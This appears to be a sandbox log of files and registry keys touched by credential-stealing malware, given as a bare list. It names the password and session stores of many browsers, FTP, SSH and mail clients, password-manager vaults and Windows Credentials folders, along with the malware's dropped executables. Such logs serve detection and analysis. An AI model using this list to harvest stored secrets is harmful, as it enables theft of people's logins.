C:\Users\user\AppData\LocalChromium\Default\Login Data
C:\Users\user\AppData\Local\Titan Browser\User Data\Default\Login Data
C:\Users\user\AppData\Local\Titan Browser\User Data\Default\Web Data
C:\Users\user\AppData\LocalTitan Browser\Login Data
C:\Users\user\AppData\LocalTitan Browser\Default\Login Data
C:\Users\user\AppData\Local\Torch\User Data\Default\Login Data
C:\Users\user\AppData\Local\Torch\User Data\Default\Web Data
C:\Users\user\AppData\LocalTorch\Login Data
C:\Users\user\AppData\LocalTorch\Default\Login Data
C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
C:\Users\user\AppData\LocalYandex\YandexBrowser\Login Data
C:\Users\user\AppData\LocalYandex\YandexBrowser\Default\Login Data
C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data
C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Web Data
C:\Users\user\AppData\LocalEpic Privacy Browser\Login Data
C:\Users\user\AppData\LocalEpic Privacy Browser\Default\Login Data
C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Web Data
C:\Users\user\AppData\LocalCocCoc\Browser\Login Data
C:\Users\user\AppData\LocalCocCoc\Browser\Default\Login Data
C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Web Data
C:\Users\user\AppData\LocalVivaldi\Login Data
C:\Users\user\AppData\LocalVivaldi\Default\Login Data
C:\Users\user\AppData\Local\Comodo\Chromodo\User Data\Default\Login Data
C:\Users\user\AppData\Local\Comodo\Chromodo\User Data\Default\Web Data
C:\Users\user\AppData\LocalComodo\Chromodo\Login Data
C:\Users\user\AppData\LocalComodo\Chromodo\Default\Login Data
C:\Users\user\AppData\Local\Superbird\User Data\Default\Login Data
C:\Users\user\AppData\Local\Superbird\User Data\Default\Web Data
C:\Users\user\AppData\LocalSuperbird\Login Data
C:\Users\user\AppData\LocalSuperbird\Default\Login Data
C:\Users\user\AppData\Local\Coowon\Coowon\User Data\Default\Login Data
C:\Users\user\AppData\Local\Coowon\Coowon\User Data\Default\Web Data
C:\Users\user\AppData\LocalCoowon\Coowon\Login Data
C:\Users\user\AppData\LocalCoowon\Coowon\Default\Login Data
C:\Users\user\AppData\Local\Mustang Browser\User Data\Default\Login Data
C:\Users\user\AppData\Local\Mustang Browser\User Data\Default\Web Data
C:\Users\user\AppData\LocalMustang Browser\Login Data
C:\Users\user\AppData\LocalMustang Browser\Default\Login Data
C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login Data
C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Web Data
C:\Users\user\AppData\Local360Browser\Browser\Login Data
C:\Users\user\AppData\Local360Browser\Browser\Default\Login Data
C:\Users\user\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Login Data
C:\Users\user\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Web Data
C:\Users\user\AppData\LocalCatalinaGroup\Citrio\Login Data
C:\Users\user\AppData\LocalCatalinaGroup\Citrio\Default\Login Data
C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data
C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Web Data
C:\Users\user\AppData\LocalGoogle\Chrome SxS\Login Data
C:\Users\user\AppData\LocalGoogle\Chrome SxS\Default\Login Data
C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
C:\Users\user\AppData\Local\Orbitum\User Data\Default\Web Data
C:\Users\user\AppData\LocalOrbitum\Login Data
C:\Users\user\AppData\LocalOrbitum\Default\Login Data
C:\Users\user\AppData\Local\Iridium\User Data\Default\Login Data
C:\Users\user\AppData\Local\Iridium\User Data\Default\Web Data
C:\Users\user\AppData\LocalIridium\Login Data
C:\Users\user\AppData\LocalIridium\Default\Login Data
C:\Users\user\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
C:\Users\user\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
C:\Users\user\AppData\Roaming\Opera\Opera Next\data\Login Data
C:\Users\user\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Login Data
C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Web Data
C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Default\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\user\AppData\Local\QupZilla\profiles\default\browsedata.db
C:\Users\user\AppData\Roaming\Opera
C:\Users\user\AppData\Roaming\.purple\accounts.xml
C:\Users\user\Documents\SuperPutty
C:\Program Files (x86)\FTPShell\ftpshell.fsi
C:\Users\user\AppData\Roaming\Notepad++\plugins\config\NppFTP\NppFTP.xml
C:\Program Files (x86)\oZone3D\MyFTP\myftp.ini
C:\Users\user\AppData\Roaming\FTPBox\profiles.conf
C:\Program Files (x86)\Sherrod Computers\sherrod FTP\favorites
C:\Program Files (x86)\FTP Now\sites.xml
C:\Program Files (x86)\NexusFile\userdata\ftpsite.ini
C:\Users\user\AppData\Roaming\NexusFile\ftpsite.ini
C:\Users\user\Documents\NetSarang\Xftp\Sessions
C:\Users\user\AppData\Roaming\NetSarang\Xftp\Sessions
C:\Program Files (x86)\EasyFTP\data
C:\Users\user\AppData\Roaming\SftpNetDrive
C:\Program Files (x86)\AbleFTP7\encPwd.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\encPwd.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\encPwd.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\encPwd.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\encPwd.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\encPwd.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\encPwd.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\encPwd.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\encPwd.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\encPwd.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\encPwd.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\encPwd.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\encPwd.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\encPwd.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\encPwd.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\encPwd.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize7\encPwd.jsd
C:\Program Files (x86)\Automize7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize8\encPwd.jsd
C:\Program Files (x86)\Automize8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize9\encPwd.jsd
C:\Program Files (x86)\Automize9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize10\encPwd.jsd
C:\Program Files (x86)\Automize10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize11\encPwd.jsd
C:\Program Files (x86)\Automize11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize12\encPwd.jsd
C:\Program Files (x86)\Automize12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize13\encPwd.jsd
C:\Program Files (x86)\Automize13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize14\encPwd.jsd
C:\Program Files (x86)\Automize14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize14\data\settings\ftpProfiles-j.jsd
C:\Users\user\AppData\Roaming\Cyberduck
C:\Users\user\AppData\Roaming\iterate_GmbH
C:\Users\user\.config\fullsync\profiles.xml
C:\Users\user\AppData\Roaming\FTPInfo\ServerList.xml
C:\Users\user\AppData\Roaming\FTPInfo\ServerList.cfg
C:\Program Files (x86)\FileZilla\Filezilla.xml
C:\Users\user\AppData\Roaming\FileZilla\filezilla.xml
C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
C:\Program Files (x86)\Staff-FTP\sites.ini
C:\Users\user\AppData\Roaming\BlazeFtp\site.dat
C:\Program Files (x86)\Fastream NETFile\My FTP Links
C:\Program Files (x86)\GoFTP\settings\Connections.txt
C:\Users\user\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
C:\Program Files (x86)\DeluxeFTP\sites.xml
C:\Windows\wcx_ftp.ini
C:\Users\user\AppData\Roaming\wcx_ftp.ini
C:\Users\user\wcx_ftp.ini
C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini
C:\Program Files (x86)\FTPGetter\Profile\servers.xml
C:\Users\user\AppData\Roaming\FTPGetter\servers.xml
C:\Program Files (x86)\WS_FTP\WS_FTP.INI
C:\Windows\WS_FTP.INI
C:\Users\user\AppData\Roaming\Ipswitch
C:\Users\user\site.xml
C:\Users\user\AppData\Local\PokerStars*
C:\Users\user\AppData\Local\ExpanDrive
C:\Users\user\AppData\Roaming\Steed\bookmarks.txt
C:\Users\user\AppData\Roaming\FlashFXP
C:\ProgramData\FlashFXP
C:\Users\user\AppData\Local\INSoftware\NovaFTP\NovaFTP.db
C:\Users\user\AppData\Roaming\NetDrive\NDSites.ini
C:\Users\user\AppData\Roaming\NetDrive2\drives.dat
C:\ProgramData\NetDrive2\drives.dat
C:\Users\user\AppData\Roaming\SmartFTP
C:\Users\user\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
C:\Users\user\Documents\*.tlp
C:\Users\user\Documents\*.bscp
C:\Users\user\Documents\*.vnc
C:\Users\user\Desktop\*.vnc
C:\Users\user\Documents\mSecure
C:\ProgramData\Syncovery
C:\Program Files (x86)\FreshWebmaster\FreshFTP\FtpSites.SMF
C:\Users\user\AppData\Roaming\BitKinex\bitkinex.ds
C:\Users\user\AppData\Roaming\UltraFXP\sites.xml
C:\Users\user\AppData\Roaming\FTP Now\sites.xml
C:\Program Files (x86)\Odin Secure FTP Expert\QFDefault.QFQ
C:\Program Files (x86)\Odin Secure FTP Expert\SiteInfo.QFP
C:\Program Files (x86)\Foxmail\mail
C:\Foxmail*
C:\Users\user\AppData\Roaming\Pocomail\accounts.ini
C:\Users\user\Documents\Pocomail\accounts.ini
C:\Users\user\AppData\Roaming\GmailNotifierPro\ConfigData.xml
C:\Users\user\AppData\Roaming\DeskSoft\CheckMail
C:\Program Files (x86)\WinFtp Client\Favorites.dat
C:\Windows\32BitFtp.TMP
C:\Windows\32BitFtp.ini
C:\FTP Navigator\Ftplist.txt
C:\Softwarenetz\Mailing\Daten\mailing.vdt
C:\Users\user\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
C:\Users\user\Documents\*Mailbox.ini
C:\Users\user\Documents\yMail2\POP3.xml
C:\Users\user\Documents\yMail2\SMTP.xml
C:\Users\user\Documents\yMail2\Accounts.xml
C:\Users\user\Documents\yMail\ymail.ini
C:\Users\user\AppData\Roaming\TrulyMail\Data\Settings\user.config
C:\Users\user\Documents\*.spn
C:\Users\user\Desktop\*.spn
C:\Users\user\AppData\Roaming\To-Do DeskList\tasks.db
C:\Users\user\AppData\Roaming\stickies\images
C:\Users\user\AppData\Roaming\stickies\rtf
C:\Users\user\AppData\Roaming\NoteFly\notes
C:\Users\user\AppData\Roaming\Conceptworld\Notezilla\Notes8.db
C:\Users\user\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt
C:\Users\user\Documents
C:\Users\user\Documents\*.kdbx
C:\Users\user\Desktop
C:\Users\user\Desktop\*.kdbx
C:\Users\user\Documents\*.kdb
C:\Users\user\Desktop\*.kdb
C:\Users\user\Documents\Enpass
C:\Users\user\Documents\My RoboForm Data
C:\Users\user\Documents\1Password
C:\Users\user\AppData\Local\Temp\Mikrotik\Winbox
C:\Users\user\AppData\Local\Temp\NETAPI32.DLL
C:\Windows\System32\netapi32.dll
C:\Users\user\AppData\Local\Temp\netutils.dll
C:\Windows\System32\netutils.dll
C:\Users\user\AppData\Local\Temp\srvcli.dll
C:\Windows\System32\srvcli.dll
C:\Users\user\AppData\Roaming\24CFE6
C:\Users\user\AppData\Roaming\24CFE6\6F2024.lck
C:\Users\user\AppData\Roaming\Microsoft\Credentials
C:\Users\user\AppData\Roaming\Microsoft\Credentials\*
C:\Users\user\AppData\Local\Microsoft\Credentials
C:\Users\user\AppData\Local\Microsoft\Credentials\*
C:\Users\user\AppData\Local\Temp\thgugommwunv0z.exe
C:\Users\user\AppData\Roaming\24CFE6\6F2024.exe
C:\Windows\Temp
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Windows\WindowsShell.Manifest
C:\Windows\System32\netapi32.dll
C:\Windows\System32\netutils.dll
C:\Windows\System32\srvcli.dll
C:\Users\user\AppData\Roaming\24CFE6\6F2024.lck
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Users\user\AppData\Roaming\24CFE6\6F2024.lck
C:\Users\user\AppData\Roaming\24CFE6\6F2024.exe
C:\Users\user\AppData\Roaming\24CFE6\6F2024.lck
C:\Users\user\AppData\Local\Temp\thgugommwunv0z.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
DisableUserModeCallbackFilter
HKEY_CURRENT_USER\Software\Borland\Locales
HKEY_LOCAL_MACHINE\Software\Borland\Locales
HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari
HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon
HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock
HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox86
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Pale Moon
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Waterfox
HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
HKEY_CURRENT_USER\Software\Ghisler\Total Commander
HKEY_CURRENT_USER\Software
HKEY_CURRENT_USER\Software\Adobe
HKEY_CURRENT_USER\Software\AppDataLow
HKEY_CURRENT_USER\Software\JavaSoft
HKEY_CURRENT_USER\Software\Microsoft
HKEY_CURRENT_USER\Software\Netscape
HKEY_CURRENT_USER\Software\ODBC
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\Sysinternals
HKEY_CURRENT_USER\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Bitvise\BvSshClient
HKEY_CURRENT_USER\Software\VanDyke\SecureFX
HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts
HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts
HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
HKEY_CURRENT_USER\Software\IncrediMail\Identities
HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
HKEY_CURRENT_USER\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail
HKEY_CURRENT_USER\Software\WinChips\UserAccounts
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0983914516512248bf1031360569f651
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0983914516512248bf1031360569f651\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\390687b675150348af0b3ed5b57f371b
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\390687b675150348af0b3ed5b57f371b\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\85e0ee07445e6649ba5bc44e8c7f096a
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\85e0ee07445e6649ba5bc44e8c7f096a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\89add512dfedc442ad3626bfcae3c4a1
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\89add512dfedc442ad3626bfcae3c4a1\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b7dcff830d0db247ab3e99f6d18d3db2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b7dcff830d0db247ab3e99f6d18d3db2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e64b0e0e47cac246ae1cad77acfe3425
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e64b0e0e47cac246ae1cad77acfe3425\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e67eb059ba9d6642890e6a6aa53ab9fb
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e67eb059ba9d6642890e6a6aa53ab9fb\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f0bb1e5f09f80a488274ca81ffbccd9c
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f0bb1e5f09f80a488274ca81ffbccd9c\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f4ef05d8e05bfb4584a20de2c515cad6
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f4ef05d8e05bfb4584a20de2c515cad6\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\SOFTWARE\flaska.net\trojita
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
